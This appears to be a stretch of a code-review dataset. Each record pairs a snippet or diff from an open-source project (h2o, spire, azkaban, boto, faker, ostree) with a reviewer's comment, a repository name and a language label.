mrb_ary_set(mrb, body, i, e); } content.len += RSTRING_LEN(e); } /* allocate memory, and copy the response */ char *dst = content.base = h2o_mem_alloc_pool(&generator->req->pool, content.len); for (i = 0; i != len; ++i) { mrb_value e = mrb_ary_entry(body, i); assert(mrb_string_p(e)); memcpy(dst, RSTRING_PTR(e), 
RSTRING_LEN(e)); dst += RSTRING_LEN(e); } /* reset body to nil, now that we have read all data */ body = mrb_nil_value(); } /* use fiber in case we need to call #each */ if (!mrb_nil_p(body)) { mrb_value receiver = h2o_mruby_send_chunked_init(generator, body); if (mrb->exc != NULL) return -1; if (!mrb_nil_p(receiver)) { mrb_value input = mrb_ary_new_capa(mrb, 2); mrb_ary_set(mrb, input, 0, body); mrb_ary_set(mrb, input, 1, generator->refs.generator); h2o_mruby_run_fiber(generator->ctx, receiver, input, 0); } return 0; } /* send the entire response immediately */ if (status == 101 || status == 204 || status == 304 || h2o_memis(generator->req->input.method.base, generator->req->input.method.len, H2O_STRLIT("HEAD"))) { h2o_start_response(generator->req, &generator->super); h2o_send(generator->req, NULL, 0, H2O_SEND_STATE_FINAL); } else { if (content.len < generator->req->res.content_length) { generator->req->res.content_length = content.len; } else { content.len = generator->req->res.content_length; } h2o_start_response(generator->req, &generator->super); h2o_send(generator->req, &content, 1, H2O_SEND_STATE_FINAL); } return 0; } void h2o_mruby_run_fiber(h2o_mruby_context_t *ctx, mrb_value receiver, mrb_value input, int *is_delegate) { h2o_mruby_context_t *old_ctx = ctx->shared->current_context; ctx->shared->current_context = ctx; mrb_state *mrb = ctx->shared->mrb; mrb_value output; mrb_int status; h2o_mruby_generator_t *generator = NULL; while (1) { /* send input to fiber */ output = mrb_funcall_argv(mrb, receiver, ctx->shared->symbols.sym_call, 1, &input); if (mrb->exc != NULL) goto GotException; if (!mrb_array_p(output)) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "rack app did not return an array")); goto GotException; } /* fetch status */ mrb_value v = mrb_to_int(mrb, mrb_ary_entry(output, 0)); if (mrb->exc != NULL) goto GotException; status = mrb_fixnum(v); if (status >= 0) break; receiver = mrb_ary_entry(output, 1); mrb_value args = 
mrb_ary_entry(output, 2); int run_again = 0; size_t callback_index = -status - 1; if (callback_index >= ctx->shared->callbacks.size) { input = mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "unexpected callback id sent from rack app"); run_again = 1; } else { h2o_mruby_callback_t callback = ctx->shared->callbacks.entries[callback_index]; input = callback(ctx, input, &receiver, args, &run_again); } if (mrb->exc != NULL) goto GotException; if (run_again == 0) { if (RARRAY_LEN(ctx->resumers) == 0) goto Exit; receiver = mrb_ary_pop(mrb, ctx->resumers); } mrb_gc_protect(mrb, receiver); mrb_gc_protect(mrb, input); } if (!(100 <= status && status <= 999)) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "status returned from rack app is out of range")); goto GotException; } generator = h2o_mruby_get_generator(mrb, mrb_ary_entry(output, 3)); /* send the response (unless req is already closed) */ if (generator == NULL) goto Exit; assert(generator->req != NULL); if (generator->req->_generator != NULL) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "unexpectedly received a rack response")); goto GotException; } if (send_response(generator, status, output, is_delegate) != 0) goto GotException; goto Exit; GotException: handle_exception(ctx, generator); Exit: ctx->shared->current_context = old_ctx; } h2o_mruby_handler_t *h2o_mruby_register(h2o_pathconf_t *pathconf, h2o_mruby_config_vars_t *vars) { h2o_mruby_handler_t *handler = (void *)h2o_create_handler(pathconf, sizeof(*handler)); handler->super.on_context_init = on_context_init; handler->super.on_context_dispose = on_context_dispose; handler->super.dispose = on_handler_dispose; handler->super.on_req = on_req; handler->config.source = h2o_strdup(NULL, vars->source.base, vars->source.len); if (vars->path != NULL) handler->config.path = h2o_strdup(NULL, vars->path, SIZE_MAX).base; handler->config.lineno = vars->lineno; return handler; } mrb_value h2o_mruby_each_to_array(h2o_mruby_shared_context_t 
*shared_ctx, mrb_value src) { return mrb_funcall_argv(shared_ctx->mrb, mrb_ary_entry(shared_ctx->constants, H2O_MRUBY_PROC_EACH_TO_ARRAY), shared_ctx->symbols.sym_call, 1, &src); } static int iterate_headers_handle_pair(h2o_mruby_shared_context_t *shared_ctx, mrb_value name, mrb_value value, int (*cb)(h2o_mruby_shared_context_t *, h2o_iovec_t, h2o_iovec_t, void *), void *cb_data) { mrb_state *mrb = shared_ctx->mrb; /* convert name and value to string */ name = h2o_mruby_to_str(mrb, name); if (mrb->exc != NULL) return -1; value = h2o_mruby_to_str(mrb, value); if (mrb->exc != NULL) return -1; /* call the callback, splitting the values with '\n' */ const char *vstart = RSTRING_PTR(value), *vend = vstart + RSTRING_LEN(value), *eol; while (1) { for (eol = vstart; eol != vend; ++eol) if (*eol == '\n') break; if (cb(shared_ctx, h2o_iovec_init(RSTRING_PTR(name), RSTRING_LEN(name)), h2o_iovec_init(vstart, eol - vstart), cb_data) != 0) return -1; if (eol == vend) break; vstart = eol + 1; } return 0; } int h2o_mruby_iterate_headers(h2o_mruby_shared_context_t *shared_ctx, mrb_value headers, int (*cb)(h2o_mruby_shared_context_t *, h2o_iovec_t, h2o_iovec_t, void *), void *cb_data) { mrb_state *mrb = shared_ctx->mrb; if (!(mrb_hash_p(headers) || mrb_array_p(headers))) { headers = h2o_mruby_each_to_array(shared_ctx, headers); if (mrb->exc != NULL) return -1; assert(mrb_array_p(headers)); } if (mrb_hash_p(headers)) { mrb_value keys = mrb_hash_keys(mrb, headers); mrb_int i, len = RARRAY_LEN(keys); for (i = 0; i != len; ++i) { mrb_value k = mrb_ary_entry(keys, i); mrb_value v = mrb_hash_get(mrb, headers, k); if (iterate_headers_handle_pair(shared_ctx, k, v, cb, cb_data) != 0) return -1; } } else { assert(mrb_array_p(headers)); mrb_int i, len = RARRAY_LEN(headers); for (i = 0; i != len; ++i) { mrb_value pair = mrb_ary_entry(headers, i); if (!mrb_array_p(pair)) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_ARGUMENT_ERROR, "array element of headers MUST by an array")); return -1; 
} if (iterate_headers_handle_pair(shared_ctx, mrb_ary_entry(pair, 0), mrb_ary_entry(pair, 1), cb, cb_data) != 0) return -1; } } return 0; }
1
12,807
Please remove the colon at the end, and merge the PR once the CI succeeds. Thank you for the PR.
h2o-h2o
c
@@ -3,8 +3,5 @@ package tools import ( - _ "github.com/AlekSi/gocoverutil" _ "github.com/golang/protobuf/protoc-gen-go" - _ "github.com/jteeuwen/go-bindata/go-bindata" - _ "github.com/mattn/goveralls" )
1
// +build tools package tools import ( _ "github.com/AlekSi/gocoverutil" _ "github.com/golang/protobuf/protoc-gen-go" _ "github.com/jteeuwen/go-bindata/go-bindata" _ "github.com/mattn/goveralls" )
1
12,476
whoops. this should be protoc-gen-doc, since that is the only bit left that is built out-of-tree (everything else is either downloaded or built via modules already depended on by spire's go.mod)
spiffe-spire
go
@@ -0,0 +1,19 @@ +package azkaban.spi; + +import java.util.Map; + +/** + * Implement this interface to report flow and job events. Event reporter + * can be turned on by setting the property {@code AZKABAN_EVENT_REPORTING_ENABLED} to true. + * + * By default, a KafkaAvroEventReporter is provided. Alternate implementations + * can be provided by setting the property {@code AZKABAN_EVENT_REPORTING_CLASS_PARAM} + * <br><br> + * The constructor will be called with a {@code azkaban.utils.Props} object passed as + * the only parameter. If such a constructor doesn't exist, then the AzkabanEventReporter + * instantiation will fail. + */ +public interface AzkabanEventReporter { + + boolean report(EventType eventType, Map<String, String> metadata); +}
1
1
14,426
The convention is to use <p> see the google style guide and use checkstyle to check. You can change it later.
azkaban-azkaban
java
@@ -134,12 +134,14 @@ class ListElement(list): def startElement(self, name, attrs, connection): for lm in self.list_marker: if name.endswith(lm): - l = ListElement(self.connection, name, self.item_marker, + l = ListElement(self.connection, name, self.list_marker, + self.item_marker, pythonize_name=self.pythonize_name) setattr(self, self.get_name(name), l) return l if name in self.item_marker: e = Element(self.connection, name, parent=self, + self.list_marker, self.item_marker, pythonize_name=self.pythonize_name) self.append(e) return e
1
# Copyright (c) 2010 Mitch Garnaat http://garnaat.org/ # Copyright (c) 2010, Eucalyptus Systems, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. 
import xml.sax import utils class XmlHandler(xml.sax.ContentHandler): def __init__(self, root_node, connection): self.connection = connection self.nodes = [('root', root_node)] self.current_text = '' def startElement(self, name, attrs): self.current_text = '' t = self.nodes[-1][1].startElement(name, attrs, self.connection) if t != None: if isinstance(t, tuple): self.nodes.append(t) else: self.nodes.append((name, t)) def endElement(self, name): self.nodes[-1][1].endElement(name, self.current_text, self.connection) if self.nodes[-1][0] == name: self.nodes.pop() self.current_text = '' def characters(self, content): self.current_text += content def parse(self, s): xml.sax.parseString(s, self) class Element(dict): def __init__(self, connection=None, element_name=None, stack=None, parent=None, list_marker=('Set',), item_marker=('member', 'item'), pythonize_name=False): dict.__init__(self) self.connection = connection self.element_name = element_name self.list_marker = utils.mklist(list_marker) self.item_marker = utils.mklist(item_marker) if stack is None: self.stack = [] else: self.stack = stack self.pythonize_name = pythonize_name self.parent = parent def __getattr__(self, key): if key in self: return self[key] for k in self: e = self[k] if isinstance(e, Element): try: return getattr(e, key) except AttributeError: pass raise AttributeError def get_name(self, name): if self.pythonize_name: name = utils.pythonize_name(name) return name def startElement(self, name, attrs, connection): self.stack.append(name) for lm in self.list_marker: if name.endswith(lm): l = ListElement(self.connection, name, self.list_marker, self.item_marker, self.pythonize_name) self[self.get_name(name)] = l return l if len(self.stack) > 0: element_name = self.stack[-1] e = Element(self.connection, element_name, self.stack, self, self.list_marker, self.item_marker, self.pythonize_name) self[self.get_name(element_name)] = e return (element_name, e) else: return None def endElement(self, name, value, 
connection): if len(self.stack) > 0: self.stack.pop() value = value.strip() if value: if isinstance(self.parent, Element): self.parent[self.get_name(name)] = value elif isinstance(self.parent, ListElement): self.parent.append(value) class ListElement(list): def __init__(self, connection=None, element_name=None, list_marker=['Set'], item_marker=('member', 'item'), pythonize_name=False): list.__init__(self) self.connection = connection self.element_name = element_name self.list_marker = list_marker self.item_marker = item_marker self.pythonize_name = pythonize_name def get_name(self, name): if self.pythonize_name: name = utils.pythonize_name(name) return name def startElement(self, name, attrs, connection): for lm in self.list_marker: if name.endswith(lm): l = ListElement(self.connection, name, self.item_marker, pythonize_name=self.pythonize_name) setattr(self, self.get_name(name), l) return l if name in self.item_marker: e = Element(self.connection, name, parent=self, pythonize_name=self.pythonize_name) self.append(e) return e else: return None def endElement(self, name, value, connection): if name == self.element_name: if len(self) > 0: empty = [] for e in self: if isinstance(e, Element): if len(e) == 0: empty.append(e) for e in empty: self.remove(e) else: setattr(self, self.get_name(name), value)
1
8,046
Using non-keyword args after the keyword arg (parent-self) will cause a SyntaxError.
boto-boto
py
@@ -277,6 +277,13 @@ module Faker '%08x-%04x-%04x-%04x-%04x%08x' % ary # rubocop:disable Style/FormatString end + def user(*args) + user_hash = {} + args = %w[username email] if args.empty? + args.each { |arg| user_hash[:"#{arg}"] = send(arg) } + user_hash + end + alias user_name username end end
1
# frozen_string_literal: true module Faker class Internet < Base class << self def email(legacy_name = NOT_GIVEN, legacy_separators = NOT_GIVEN, name: nil, separators: nil) warn_for_deprecated_arguments do |keywords| keywords << :name if legacy_name != NOT_GIVEN keywords << :separators if legacy_separators != NOT_GIVEN end if separators [username(specifier: name, separators: separators), domain_name].join('@') else [username(specifier: name), domain_name].join('@') end end def free_email(legacy_name = NOT_GIVEN, name: nil) warn_for_deprecated_arguments do |keywords| keywords << :name if legacy_name != NOT_GIVEN end [username(specifier: name), fetch('internet.free_email')].join('@') end def safe_email(legacy_name = NOT_GIVEN, name: nil) warn_for_deprecated_arguments do |keywords| keywords << :name if legacy_name != NOT_GIVEN end [username(specifier: name), 'example.' + sample(%w[org com net])].join('@') end def username(legacy_specifier = NOT_GIVEN, legacy_separators = NOT_GIVEN, specifier: nil, separators: %w[. _]) warn_for_deprecated_arguments do |keywords| keywords << :specifier if legacy_specifier != NOT_GIVEN keywords << :separators if legacy_separators != NOT_GIVEN end with_locale(:en) do return shuffle(specifier.scan(/[[:word:]]+/)).join(sample(separators)).downcase if specifier.respond_to?(:scan) if specifier.is_a?(Integer) # If specifier is Integer and has large value, Argument error exception is raised to overcome memory full error raise ArgumentError, 'Given argument is too large' if specifier > 10**6 tries = 0 # Don't try forever in case we get something like 1_000_000. result = nil loop do result = username(specifier: nil, separators: separators) tries += 1 break unless result.length < specifier && tries < 7 end return result * (specifier / result.length + 1) if specifier.positive? 
elsif specifier.is_a?(Range) tries = 0 result = nil loop do result = username(specifier: specifier.min, separators: separators) tries += 1 break unless !specifier.include?(result.length) && tries < 7 end return result[0...specifier.max] end sample([ Char.prepare(Name.first_name), [Name.first_name, Name.last_name].map do |name| Char.prepare(name) end.join(sample(separators)) ]) end end ## # Produces a randomized string of characters # # @param [Integer] min_length # @param [Integer] max_length # @param [Boolean] mix_case # @param [Boolean] special_characters # # @return [String] # # @example Faker::Internet.password #=> "Vg5mSvY1UeRg7" # @example Faker::Internet.password(min_length: 8) #=> "YfGjIk0hGzDqS0" # @example Faker::Internet.password(min_length: 10, max_length: 20) #=> "EoC9ShWd1hWq4vBgFw" # @example Faker::Internet.password(min_length: 10, max_length: 20, mix_case: true) #=> "3k5qS15aNmG" # @example Faker::Internet.password(min_length: 10, max_length: 20, mix_case: true, special_characters: true) #=> "*%NkOnJsH4" # # @faker.version 2.1.3 # rubocop:disable Metrics/ParameterLists def password(legacy_min_length = NOT_GIVEN, legacy_max_length = NOT_GIVEN, legacy_mix_case = NOT_GIVEN, legacy_special_characters = NOT_GIVEN, min_length: 8, max_length: 16, mix_case: true, special_characters: false) warn_for_deprecated_arguments do |keywords| keywords << :min_length if legacy_min_length != NOT_GIVEN keywords << :max_length if legacy_max_length != NOT_GIVEN keywords << :mix_case if legacy_mix_case != NOT_GIVEN keywords << :special_characters if legacy_special_characters != NOT_GIVEN end min_alpha = mix_case ? 2 : 0 temp = Lorem.characters(number: min_length, min_alpha: min_alpha) diff_length = max_length - min_length if diff_length.positive? diff_rand = rand(diff_length + 1) temp += Lorem.characters(number: diff_rand) end if mix_case alpha_count = 0 temp.chars.each_with_index do |char, index| if char =~ /[[:alpha:]]/ temp[index] = char.upcase if alpha_count.even? 
alpha_count += 1 end end end if special_characters chars = %w[! @ # $ % ^ & *] rand(1..min_length).times do |i| temp[i] = chars[rand(chars.length)] end end temp end def domain_name(legacy_subdomain = NOT_GIVEN, subdomain: false) warn_for_deprecated_arguments do |keywords| keywords << :subdomain if legacy_subdomain != NOT_GIVEN end with_locale(:en) do domain_elements = [Char.prepare(domain_word), domain_suffix] domain_elements.unshift(Char.prepare(domain_word)) if subdomain domain_elements.join('.') end end def fix_umlauts(legacy_string = NOT_GIVEN, string: '') warn_for_deprecated_arguments do |keywords| keywords << :string if legacy_string != NOT_GIVEN end Char.fix_umlauts(string) end def domain_word with_locale(:en) { Char.prepare(Company.name.split(' ').first) } end def domain_suffix fetch('internet.domain_suffix') end def mac_address(legacy_prefix = NOT_GIVEN, prefix: '') warn_for_deprecated_arguments do |keywords| keywords << :prefix if legacy_prefix != NOT_GIVEN end prefix_digits = prefix.split(':').map { |d| d.to_i(16) } address_digits = Array.new((6 - prefix_digits.size)) { rand(256) } (prefix_digits + address_digits).map { |d| format('%02x', d) }.join(':') end def ip_v4_address [rand_in_range(0, 255), rand_in_range(0, 255), rand_in_range(0, 255), rand_in_range(0, 255)].join('.') end def private_ip_v4_address addr = nil loop do addr = ip_v4_address break if private_net_checker[addr] end addr end def public_ip_v4_address addr = nil loop do addr = ip_v4_address break unless reserved_net_checker[addr] end addr end def private_nets_regex [ /^10\./, # 10.0.0.0 - 10.255.255.255 /^100\.(6[4-9]|[7-9]\d|1[0-1]\d|12[0-7])\./, # 100.64.0.0 - 100.127.255.255 /^127\./, # 127.0.0.0 - 127.255.255.255 /^169\.254\./, # 169.254.0.0 - 169.254.255.255 /^172\.(1[6-9]|2\d|3[0-1])\./, # 172.16.0.0 - 172.31.255.255 /^192\.0\.0\./, # 192.0.0.0 - 192.0.0.255 /^192\.168\./, # 192.168.0.0 - 192.168.255.255 /^198\.(1[8-9])\./ # 198.18.0.0 - 198.19.255.255 ] end def private_net_checker 
->(addr) { private_nets_regex.any? { |net| net =~ addr } } end def reserved_nets_regex [ /^0\./, # 0.0.0.0 - 0.255.255.255 /^192\.0\.2\./, # 192.0.2.0 - 192.0.2.255 /^192\.88\.99\./, # 192.88.99.0 - 192.88.99.255 /^198\.51\.100\./, # 198.51.100.0 - 198.51.100.255 /^203\.0\.113\./, # 203.0.113.0 - 203.0.113.255 /^(22[4-9]|23\d)\./, # 224.0.0.0 - 239.255.255.255 /^(24\d|25[0-5])\./ # 240.0.0.0 - 255.255.255.254 and 255.255.255.255 ] end def reserved_net_checker ->(addr) { (private_nets_regex + reserved_nets_regex).any? { |net| net =~ addr } } end def ip_v4_cidr "#{ip_v4_address}/#{rand(1..31)}" end def ip_v6_address (1..8).map { rand(65_536).to_s(16) }.join(':') end def ip_v6_cidr "#{ip_v6_address}/#{rand(1..127)}" end def url(legacy_host = NOT_GIVEN, legacy_path = NOT_GIVEN, legacy_scheme = NOT_GIVEN, host: domain_name, path: "/#{username}", scheme: 'http') # rubocop:enable Metrics/ParameterLists warn_for_deprecated_arguments do |keywords| keywords << :host if legacy_host != NOT_GIVEN keywords << :path if legacy_path != NOT_GIVEN keywords << :scheme if legacy_scheme != NOT_GIVEN end "#{scheme}://#{host}#{path}" end def slug(legacy_words = NOT_GIVEN, legacy_glue = NOT_GIVEN, words: nil, glue: nil) warn_for_deprecated_arguments do |keywords| keywords << :words if legacy_words != NOT_GIVEN keywords << :glue if legacy_glue != NOT_GIVEN end glue ||= sample(%w[- _]) (words || Faker::Lorem.words(number: 2).join(' ')).delete(',.').gsub(' ', glue).downcase end def device_token shuffle(rand(16**64).to_s(16).rjust(64, '0').chars.to_a).join end def user_agent(legacy_vendor = NOT_GIVEN, vendor: nil) warn_for_deprecated_arguments do |keywords| keywords << :vendor if legacy_vendor != NOT_GIVEN end agent_hash = translate('faker.internet.user_agent') agents = vendor.respond_to?(:to_sym) && agent_hash[vendor.to_sym] || agent_hash[sample(agent_hash.keys)] sample(agents) end def uuid # borrowed from: 
https://github.com/ruby/ruby/blob/d48783bb0236db505fe1205d1d9822309de53a36/lib/securerandom.rb#L250 ary = Faker::Config.random.bytes(16).unpack('NnnnnN') ary[2] = (ary[2] & 0x0fff) | 0x4000 ary[3] = (ary[3] & 0x3fff) | 0x8000 '%08x-%04x-%04x-%04x-%04x%08x' % ary # rubocop:disable Style/FormatString end alias user_name username end end end
1
9,334
I think you'll want to add some YARD docs to this method to get the PR approved
faker-ruby-faker
rb
@@ -4452,12 +4452,13 @@ ostree_repo_query_object_storage_size (OstreeRepo *self, * @self: Repo * @objtype: Object type * @sha256: ASCII checksum - * @out_variant: (out) (transfer full): Metadata + * @out_variant: (out) (nullable) (transfer full): Metadata * @error: Error * * Attempt to load the metadata object @sha256 of type @objtype if it * exists, storing the result in @out_variant. If it doesn't exist, - * %NULL is returned. + * @out_variant will be set to %NULL and the function will still + * return TRUE. */ gboolean ostree_repo_load_variant_if_exists (OstreeRepo *self,
1
/* * Copyright (C) 2011 Colin Walters <[email protected]> * Copyright (C) 2015 Red Hat, Inc. * * SPDX-License-Identifier: LGPL-2.0+ * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the * Free Software Foundation, Inc., 59 Temple Place - Suite 330, * Boston, MA 02111-1307, USA. * * Author: Colin Walters <[email protected]> */ #include "config.h" #include <glib-unix.h> #include <gio/gunixinputstream.h> #include <gio/gunixoutputstream.h> #include <gio/gfiledescriptorbased.h> #include "libglnx.h" #include "otutil.h" #include <glnx-console.h> #include <linux/magic.h> #include "ostree-core-private.h" #include "ostree-sysroot-private.h" #include "ostree-remote-private.h" #include "ostree-repo-private.h" #include "ostree-repo-file.h" #include "ostree-repo-file-enumerator.h" #include "ostree-gpg-verifier.h" #include "ostree-repo-static-delta-private.h" #include "ot-fs-utils.h" #include "ostree-autocleanups.h" #include <locale.h> #include <glib/gstdio.h> #include <sys/file.h> #include <sys/statvfs.h> #include <sys/statfs.h> #define REPO_LOCK_DISABLED (-2) #define REPO_LOCK_BLOCKING (-1) /* ABI Size checks for ostree-repo.h, only for LP64 systems; * https://en.wikipedia.org/wiki/64-bit_computing#64-bit_data_models * * To generate this data, I used `pahole` from gdb. More concretely, `gdb --args * /usr/bin/ostree`, then `start`, (to ensure debuginfo was loaded), then e.g. 
* `$ pahole OstreeRepoTransactionStats`. */ #if __SIZEOF_POINTER__ == 8 && __SIZEOF_LONG__ == 8 && __SIZEOF_INT__ == 4 G_STATIC_ASSERT(sizeof(OstreeRepoTransactionStats) == sizeof(int) * 4 + 8 * 5); G_STATIC_ASSERT(sizeof(OstreeRepoImportArchiveOptions) == sizeof(int) * 9 + 4 + sizeof(void*) * 8); G_STATIC_ASSERT(sizeof(OstreeRepoExportArchiveOptions) == sizeof(int) * 9 + 4 + 8 + sizeof(void*) * 8); G_STATIC_ASSERT(sizeof(OstreeRepoCheckoutAtOptions) == sizeof(OstreeRepoCheckoutMode) + sizeof(OstreeRepoCheckoutOverwriteMode) + sizeof(int)*6 + sizeof(int)*5 + sizeof(int) + sizeof(void*)*2 + sizeof(int)*6 + sizeof(void*)*7); G_STATIC_ASSERT(sizeof(OstreeRepoCommitTraverseIter) == sizeof(int) + sizeof(int) + sizeof(void*) * 10 + 130 + 6); /* 6 byte hole */ G_STATIC_ASSERT(sizeof(OstreeRepoPruneOptions) == sizeof(OstreeRepoPruneFlags) + 4 + sizeof(void*) + sizeof(int) * 12 + sizeof(void*) * 7); #endif /** * SECTION:ostree-repo * @title: OstreeRepo: Content-addressed object store * @short_description: A git-like storage system for operating system binaries * * The #OstreeRepo is like git, a content-addressed object store. * Unlike git, it records uid, gid, and extended attributes. * * There are four possible "modes" for an #OstreeRepo; %OSTREE_REPO_MODE_BARE * is very simple - content files are represented exactly as they are, and * checkouts are just hardlinks. %OSTREE_REPO_MODE_BARE_USER is similar, except * the uid/gids are not set on the files, and checkouts as hardlinks work only * for user checkouts. %OSTREE_REPO_MODE_BARE_USER_ONLY is the same as * BARE_USER, but all metadata is not stored, so it can only be used for user * checkouts. This mode does not require xattrs. A %OSTREE_REPO_MODE_ARCHIVE * (also known as %OSTREE_REPO_MODE_ARCHIVE_Z2) repository in contrast stores * content files zlib-compressed. It is suitable for non-root-owned * repositories that can be served via a static HTTP server. 
* * Creating an #OstreeRepo does not invoke any file I/O, and thus needs * to be initialized, either from existing contents or as a new * repository. If you have an existing repo, use ostree_repo_open() * to load it from disk and check its validity. To initialize a new * repository in the given filepath, use ostree_repo_create() instead. * * To store content in the repo, first start a transaction with * ostree_repo_prepare_transaction(). Then create a * #OstreeMutableTree, and apply functions such as * ostree_repo_write_directory_to_mtree() to traverse a physical * filesystem and write content, possibly multiple times. * * Once the #OstreeMutableTree is complete, write all of its metadata * with ostree_repo_write_mtree(), and finally create a commit with * ostree_repo_write_commit(). * * ## Collection IDs * * A collection ID is a globally unique identifier which, if set, is used to * identify refs from a repository which are mirrored elsewhere, such as in * mirror repositories or peer to peer networks. * * This is separate from the `collection-id` configuration key for a remote, which * is used to store the collection ID of the repository that remote points to. * * The collection ID should only be set on an #OstreeRepo if it is the canonical * collection for some refs. * * A collection ID must be a reverse DNS name, where the domain name is under the * control of the curator of the collection, so they can demonstrate ownership * of the collection. The later elements in the reverse DNS name can be used to * disambiguate between multiple collections from the same curator. For example, * `org.exampleos.Main` and `org.exampleos.Apps`. For the complete format of * collection IDs, see ostree_validate_collection_id(). 
*/ typedef struct { GObjectClass parent_class; #ifndef OSTREE_DISABLE_GPGME void (*gpg_verify_result) (OstreeRepo *self, const char *checksum, OstreeGpgVerifyResult *result); #endif } OstreeRepoClass; enum { PROP_0, PROP_PATH, PROP_REMOTES_CONFIG_DIR, PROP_SYSROOT_PATH }; enum { GPG_VERIFY_RESULT, LAST_SIGNAL }; #ifndef OSTREE_DISABLE_GPGME static guint signals[LAST_SIGNAL] = { 0 }; #endif G_DEFINE_TYPE (OstreeRepo, ostree_repo, G_TYPE_OBJECT) #define SYSCONF_REMOTES SHORTENED_SYSCONFDIR "/ostree/remotes.d" /* Repository locking * * To guard against objects being deleted (e.g., prune) while they're in * use by another operation is accessing them (e.g., commit), the * repository must be locked by concurrent writers. * * The locking is implemented by maintaining a thread local table of * lock stacks per repository. This allows thread safe locking since * each thread maintains its own lock stack. See the OstreeRepoLock type * below. * * The actual locking is done using either open file descriptor locks or * flock locks. This allows the locking to work with concurrent * processes. The lock file is held on the ".lock" file within the * repository. * * The intended usage is to take a shared lock when writing objects or * reading objects in critical sections. Exclusive locks are taken when * deleting objects. * * To allow fine grained locking within libostree, the lock is * maintained as a stack. The core APIs then push or pop from the stack. * When pushing or popping a lock state identical to the existing or * next state, the stack is simply updated. Only when upgrading or * downgrading the lock (changing to/from unlocked, pushing exclusive on * shared or popping exclusive to shared) are actual locking operations * performed. 
*/ static void free_repo_lock_table (gpointer data) { GHashTable *lock_table = data; if (lock_table != NULL) { g_debug ("Free lock table"); g_hash_table_destroy (lock_table); } } static GPrivate repo_lock_table = G_PRIVATE_INIT (free_repo_lock_table); typedef struct { int fd; GQueue stack; } OstreeRepoLock; typedef struct { guint len; int state; const char *name; } OstreeRepoLockInfo; static void repo_lock_info (OstreeRepoLock *lock, OstreeRepoLockInfo *out_info) { g_assert (lock != NULL); g_assert (out_info != NULL); OstreeRepoLockInfo info; info.len = g_queue_get_length (&lock->stack); if (info.len == 0) { info.state = LOCK_UN; info.name = "unlocked"; } else { info.state = GPOINTER_TO_INT (g_queue_peek_head (&lock->stack)); info.name = (info.state == LOCK_EX) ? "exclusive" : "shared"; } *out_info = info; } static void free_repo_lock (gpointer data) { OstreeRepoLock *lock = data; if (lock != NULL) { OstreeRepoLockInfo info; repo_lock_info (lock, &info); g_debug ("Free lock: state=%s, depth=%u", info.name, info.len); g_queue_clear (&lock->stack); if (lock->fd >= 0) { g_debug ("Closing repo lock file"); (void) close (lock->fd); } g_free (lock); } } /* Wrapper to handle flock vs OFD locking based on GLnxLockFile */ static gboolean do_repo_lock (int fd, int flags) { int res; #ifdef F_OFD_SETLK struct flock fl = { .l_type = (flags & ~LOCK_NB) == LOCK_EX ? F_WRLCK : F_RDLCK, .l_whence = SEEK_SET, .l_start = 0, .l_len = 0, }; res = TEMP_FAILURE_RETRY (fcntl (fd, (flags & LOCK_NB) ? 
F_OFD_SETLK : F_OFD_SETLKW, &fl)); #else res = -1; errno = EINVAL; #endif /* Fallback to flock when OFD locks not available */ if (res < 0) { if (errno == EINVAL) res = TEMP_FAILURE_RETRY (flock (fd, flags)); if (res < 0) return FALSE; } return TRUE; } /* Wrapper to handle flock vs OFD unlocking based on GLnxLockFile */ static gboolean do_repo_unlock (int fd, int flags) { int res; #ifdef F_OFD_SETLK struct flock fl = { .l_type = F_UNLCK, .l_whence = SEEK_SET, .l_start = 0, .l_len = 0, }; res = TEMP_FAILURE_RETRY (fcntl (fd, (flags & LOCK_NB) ? F_OFD_SETLK : F_OFD_SETLKW, &fl)); #else res = -1; errno = EINVAL; #endif /* Fallback to flock when OFD locks not available */ if (res < 0) { if (errno == EINVAL) res = TEMP_FAILURE_RETRY (flock (fd, LOCK_UN | flags)); if (res < 0) return FALSE; } return TRUE; } static gboolean push_repo_lock (OstreeRepo *self, OstreeRepoLockType lock_type, gboolean blocking, GError **error) { int flags = (lock_type == OSTREE_REPO_LOCK_EXCLUSIVE) ? LOCK_EX : LOCK_SH; if (!blocking) flags |= LOCK_NB; GHashTable *lock_table = g_private_get (&repo_lock_table); if (lock_table == NULL) { g_debug ("Creating repo lock table"); lock_table = g_hash_table_new_full (NULL, NULL, NULL, (GDestroyNotify)free_repo_lock); g_private_set (&repo_lock_table, lock_table); } OstreeRepoLock *lock = g_hash_table_lookup (lock_table, self); if (lock == NULL) { lock = g_new0 (OstreeRepoLock, 1); g_queue_init (&lock->stack); g_debug ("Opening repo lock file"); lock->fd = TEMP_FAILURE_RETRY (openat (self->repo_dir_fd, ".lock", O_CREAT | O_RDWR | O_CLOEXEC, DEFAULT_REGFILE_MODE)); if (lock->fd < 0) { free_repo_lock (lock); return glnx_throw_errno_prefix (error, "Opening lock file %s/.lock 